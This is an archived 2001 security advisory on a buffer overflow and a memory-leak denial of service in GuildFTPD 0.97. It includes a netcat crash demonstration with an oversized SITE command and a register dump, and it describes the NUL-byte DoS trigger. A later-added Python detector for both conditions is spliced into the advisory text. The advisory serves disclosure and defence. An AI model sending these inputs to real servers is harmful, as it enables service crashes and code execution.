def-2001-27: GuildFTPD Buffer Overflow and Memory Leak DoS

From: andreas junestam (andreas.junestamat_private)
Date: Sun May 27 2001 - 13:37:06 PDT


    ======================================================================
                      Defcom Labs Advisory def-2001-27
    
                   GuildFTPD Buffer Overflow and Memory Leak DoS
    
    Author: Andreas Junestam <andreasat_private>
    Co-Author: Janne Sarendal <janneat_private>
    Release Date: 2001-05-22
    ======================================================================
    ------------------------=[Brief Description]=-------------------------
    GuildFTPD contains two different problems:
    1. Buffer overrun in the SITE command with the ability to execute
       arbitrary code
    2. A memory leak in the input parsing code
    
    ------------------------=[Affected Systems]=--------------------------
    - GuildFtpd v0.97 (probably earlier versions too)
    
    ----------------------=[Detailed Description]=------------------------
    * SITE command Buffer Overflow
      All the SITE commands are handled in a DLL (sitecmd.dll) which suffers
      from a buffer overflow. By sending a SITE command greater than 261
      bytes, a buffer will overflow and it is possible to execute
      arbitrary code. We have chosen not to include the working exploit.
    
      C:\>nc 127.0.0.1 21
      220-GuildFTPD FTP Server (c) 1999,2000
      220-Version 0.97
      220 Please enter your name:
      user a
      331 User name okay, Need password.
      pass a
      230 User logged in.
      site AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
      AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
      AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
      AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    
      Access violation - code c0000005 (first chance)
      eax=01450000 ebx=00000001 ecx=00000000 edx=00130608 esi=10030000 edi=009ed9e0
      eip=41414141 esp=01bcf9b4 ebp=10030000 iopl=0         nv up ei pl nz na po nc
      cs=001b  ss=0023  ds=0023  es=0023  fs=0038  gs=0000             efl=00010206
    
    * Memory Leak DoS
      The input parsing code in GuildFTPD contains a memory leak that is
      triggered by any request containing a NULL (0x00) character.
      GuildFTPD will still answer new requests, but eventually the server
      will run out of memory and the machine will crash.
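    As an added defender-side example (not code from the advisory or from
    GuildFTPD), the following Python scans a captured client-to-server FTP
    command stream for the two conditions described above: a SITE command
    line longer than 261 bytes and any request carrying a NUL byte. The
    sample session, the finding labels and the decision to measure the
    whole command line (verb plus argument, without CRLF) are assumptions.

```python
# Added example: flag FTP command lines matching the two GuildFTPD 0.97
# conditions in this advisory. Not GuildFTPD code; thresholds follow the
# advisory text, everything else is an illustrative assumption.
from typing import Dict, List

# The advisory reports overflow for a SITE command greater than 261 bytes.
SITE_CMD_LIMIT = 261


def check_ftp_command(raw: bytes) -> List[str]:
    """Return the findings for one raw FTP command line (bytes, CRLF included)."""
    findings: List[str] = []

    # Condition 2: a NUL byte anywhere in the request triggers the memory leak.
    if b"\x00" in raw:
        findings.append("nul-byte-in-request")

    # Condition 1: an oversized SITE command line overruns the buffer in
    # sitecmd.dll. Length is measured without the trailing CRLF (assumption).
    line = raw.rstrip(b"\r\n")
    verb = line.split(b" ", 1)[0]
    if verb.upper() == b"SITE" and len(line) > SITE_CMD_LIMIT:
        findings.append(f"oversized-site-command:{len(line)}")

    return findings


def scan_session(lines: List[bytes]) -> Dict[int, List[str]]:
    """Map the index of each suspicious command line to its findings."""
    return {i: f for i, line in enumerate(lines) if (f := check_ftp_command(line))}


# Constructed sample session: benign login and SITE usage, then one
# oversized SITE line and one request containing a NUL byte.
SAMPLE_SESSION = [
    b"USER a\r\n",
    b"PASS a\r\n",
    b"SITE HELP\r\n",
    b"SITE " + b"A" * 300 + b"\r\n",
    b"PWD\x00\r\n",
]

if __name__ == "__main__":
    for idx, found in scan_session(SAMPLE_SESSION).items():
        print(f"line {idx}: {', '.join(found)}")
```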
    
    ---------------------------=[Workaround]=-----------------------------
    None for the moment
    
    -------------------------=[Vendor Response]=--------------------------
    This issue was brought to the developer's attention on the 24th of
    April, 2001; no response so far.
    
    ======================================================================
                This release was brought to you by Defcom Labs UK
    
                  labsat_private             www.defcom.com
    ======================================================================
    



    This archive was generated by hypermail 2b30 : Mon May 28 2001 - 09:59:47 PDT